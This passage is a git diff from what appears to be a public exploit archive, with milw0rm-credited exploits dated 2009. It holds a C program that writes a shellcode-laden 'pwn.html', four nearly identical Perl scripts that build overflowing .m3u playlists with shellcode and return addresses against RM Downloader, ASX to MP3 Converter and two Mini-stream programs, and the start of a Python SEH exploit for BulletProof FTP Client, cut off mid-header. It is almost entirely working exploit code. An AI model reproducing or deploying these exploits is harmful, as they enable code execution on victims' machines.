+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
+"\x4e\x56\x43\x46\x42\x30\x5a";
+
+
+
+int main() {
+
+FILE *file;
+int i=0;
+char buf[LEN+1];
+char *ptr=buf;
+
+memset(buf,0x00,LEN+1);
+memset(buf,NOP,LEN);
+*(unsigned long *)&buf[56] = JMP;
+*(unsigned long *)&buf[60] = RET;
+ptr+=56+4+4+40;
+memcpy(ptr, scode, strlen(scode));
+
+file=fopen("pwn.html","w");
+
+fprintf(file, "<HTML>\n<HEAD></HEAD>\n<BODY>\n<img src=\"");
+fputs(buf,file);
+fprintf(file, "\">\n</BODY>\n</HTML>\n");
+fclose(file);
+
+
+printf("File created..\n");
+ return 0;
+}
+
+// milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8410.pl b/platforms/windows/local/8410.pl
index c254bb5bc..50fff4b6a 100755
--- a/platforms/windows/local/8410.pl
+++ b/platforms/windows/local/8410.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-# RM Downloader Version 3.0.0.9 .m3u Universal Stack Overflow Exploit
-# Disoverd By Cyber-Zone
-# Exploited By Stack
-my $Header = "#EXTM3U\n";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $ex="http://"."A" x 26117;
-my $ret="\x17\x48\xF8\x01"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
- # "\x5D\x38\x82\x7C";
-my $nop="\x90" x 20;
-open(MYFILE,'>>RM-Downloader.m3u');
-print MYFILE $Header.$ex.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/perl
+# RM Downloader Version 3.0.0.9 .m3u Universal Stack Overflow Exploit
+# Disoverd By Cyber-Zone
+# Exploited By Stack
+my $Header = "#EXTM3U\n";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\x17\x48\xF8\x01"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
+ # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20;
+open(MYFILE,'>>RM-Downloader.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8412.pl b/platforms/windows/local/8412.pl
index 7966639cb..f744b3c07 100755
--- a/platforms/windows/local/8412.pl
+++ b/platforms/windows/local/8412.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-# ASX to MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit
-# Disoverd By Cyber-Zone
-# Exploited By Stack
-my $Header = "#EXTM3U\n";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $ex="http://"."A" x 26117;
-my $ret="\xBE\x2F\x38\x02"; # Universall Ret Adress and if you want Tes under SP 2 EN/FR use this >>
- # "\x5D\x38\x82\x7C";
-my $nop="\x90" x 20;
-open(MYFILE,'>>ASX2MP3Converte.m3u');
-print MYFILE $Header.$ex.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/perl
+# ASX to MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit
+# Disoverd By Cyber-Zone
+# Exploited By Stack
+my $Header = "#EXTM3U\n";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\xBE\x2F\x38\x02"; # Universall Ret Adress and if you want Tes under SP 2 EN/FR use this >>
+ # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20;
+open(MYFILE,'>>ASX2MP3Converte.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8413.pl b/platforms/windows/local/8413.pl
index 54c60fd55..046df0a9f 100755
--- a/platforms/windows/local/8413.pl
+++ b/platforms/windows/local/8413.pl
@@ -1,37 +1,37 @@ -#!/usr/bin/perl -# Mini-stream RM-MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit -# Disoverd By Cyber-Zone -# Exploited By Stack -my $Header = "#EXTM3U\n"; -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". -"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47". -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38". -"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48". -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58". -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". -"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". -"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". -"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47". -"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a". -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53". -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". -"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". 
-"\x4e\x46\x43\x36\x42\x50\x5a"; -my $ex="http://"."A" x 26117; -my $ret="\x3D\x0C\x04\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >> - # "\x5D\x38\x82\x7C"; -my $nop="\x90" x 20; -open(MYFILE,'>>Mini-stream-RM-MP3.m3u'); -print MYFILE $Header.$ex.$ret.$nop.$shellcode; -close(MYFILE); - -# milw0rm.com [2009-04-13] +#!/usr/bin/perl +# Mini-stream RM-MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit +# Disoverd By Cyber-Zone +# Exploited By Stack +my $Header = "#EXTM3U\n"; +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". +"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47". +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38". +"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48". +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58". +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". +"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". +"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". +"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47". +"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a". +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53". +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". +"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". 
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\x3D\x0C\x04\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
+ # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20;
+open(MYFILE,'>>Mini-stream-RM-MP3.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8416.pl b/platforms/windows/local/8416.pl
index 0aac5ad76..9f976e5fa 100755
--- a/platforms/windows/local/8416.pl
+++ b/platforms/windows/local/8416.pl
@@ -1,37 +1,37 @@ -#!/usr/bin/perl -# Mini-stream Ripper Version 3.0.1.1 .m3u Universal Stack Overflow Exploit -# Disoverd By Cyber-Zone -# Exploited By Stack -my $Header = "#EXTM3U\n"; -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". -"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47". -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38". -"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48". -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58". -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". -"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". -"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". -"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47". -"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a". -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53". -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". -"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". 
-"\x4e\x46\x43\x36\x42\x50\x5a"; -my $ex="http://"."A" x 26117; -my $ret="\x1D\xE3\x07\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >> - # "\x5D\x38\x82\x7C"; -my $nop="\x90" x 20; -open(MYFILE,'>>Mini-stream-Ripper.m3u'); -print MYFILE $Header.$ex.$ret.$nop.$shellcode; -close(MYFILE); - -# milw0rm.com [2009-04-13] +#!/usr/bin/perl +# Mini-stream Ripper Version 3.0.1.1 .m3u Universal Stack Overflow Exploit +# Disoverd By Cyber-Zone +# Exploited By Stack +my $Header = "#EXTM3U\n"; +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". +"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47". +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38". +"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48". +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58". +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". +"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". +"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". +"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47". +"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a". +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53". +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". +"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". 
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\x1D\xE3\x07\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
+ # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20;
+open(MYFILE,'>>Mini-stream-Ripper.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8420.py b/platforms/windows/local/8420.py
index c22e95fb7..6603c4c64 100755
--- a/platforms/windows/local/8420.py
+++ b/platforms/windows/local/8420.py
@@ -1,52 +1,52 @@ -#!/usr/bin/python -#[*] Bug : BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH) -#[*] Credits : Stack -#[*] Tested on : Xp sp2 (fr) -#[*] Exploited by : His0k4 -#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com -#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D -#[*] translate by Cyb3r-1st: esse7 embe7 embou :D - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode=( -"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71" -"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8" -"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4" -"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80" -"\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb" -"\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9" -"\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06" -"\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5" -"\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89" -"\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d") - -header1=( -"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74" -"\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74" -"\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e" -"\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20" 